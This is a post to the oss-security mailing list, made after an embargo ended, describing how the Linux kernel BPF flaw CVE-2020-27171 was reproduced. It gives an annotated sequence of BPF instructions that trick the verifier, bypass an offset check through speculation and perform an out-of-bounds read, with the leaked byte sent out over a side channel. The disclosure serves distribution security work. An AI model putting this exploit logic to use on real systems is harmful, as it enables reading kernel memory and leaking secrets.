[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: [CVE-2020-27171] Numeric error when restricting speculative pointer arithmetic al
From:       Piotr Krysiuk <piotras () gmail ! com>
Date:       2021-03-24 19:38:11
Message-ID: CAFzhf4p-q+Lf35mfjUQwdV-yqYHQUW06BEs9rJG9OO4LL2YoNQ () mail ! gmail ! com
[Download RAW message or body]

Some details of how CVE-2020-27171 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.

As the embargo expires today, I was asked to share these details
publically on oss-security.

The CVE-2020-27171 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:

    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    BPF_MOV64_REG(BPF_REG_OOB_ADDRESS, BPF_REG_MAP_PTR),

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively subtract masked BPF_REG_OFFSET from BPF_REG_OOB_ADDRESS,
    // where incorrect mask value 0xffffffff is used due to integer underflow
    BPF_ALU64_REG(BPF_SUB, BPF_REG_OOB_ADDRESS, BPF_REG_OFFSET),

    // speculatively out-of-bounds load
    BPF_LDX_MEM(BPF_B, BPF_REG_LEAKED_BYTE, BPF_REG_OOB_ADDRESS, 0),

    transmit speculatively loaded BPF_REG_LEAKED_BYTE via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.
[prev in list] [next in list] [prev in thread] [next in thread]